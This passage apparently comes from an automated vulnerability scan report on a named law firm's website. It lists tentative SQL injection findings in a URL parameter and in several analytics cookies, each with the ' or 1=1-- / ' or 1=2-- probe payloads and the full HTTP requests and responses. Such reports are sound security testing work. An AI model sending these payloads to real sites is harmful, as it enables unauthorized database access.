Date: Thu, 12 May 2011 16:46:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: PCUSERNAME=;expires=Wed, 12-May-2010 16:46:26 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=11780295'%20or%201%3d2--%20; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:46:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.66. http://www.pillsburylaw.com/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 14296614'%20or%201%3d1--%20 and 14296614'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm14296614'%20or%201%3d1--%20?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:47:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /index.cfm14296614'%20or%201%3d2--%20?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:47:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...

1.67. http://www.pillsburylaw.com/index.cfm [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 12857343'%20or%201%3d1--%20 and 12857343'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.312857343'%20or%201%3d1--%20; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:45:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Wed, 12-May-2010 16:45:03 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.312857343'%20or%201%3d2--%20; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:45:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.68. http://www.pillsburylaw.com/index.cfm [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 11705977'%20or%201%3d1--%20 and 11705977'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.130521865811705977'%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:46:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMB=;expires=Wed, 12-May-2010 16:46:51 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.130521865811705977'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:46:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.69. http://www.pillsburylaw.com/index.cfm [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 62299062%20or%201%3d1--%20 and 62299062%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=24928704662299062%20or%201%3d1--%20; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:46:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Wed, 12-May-2010 16:46:45 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=24928704662299062%20or%201%3d2--%20; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:46:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
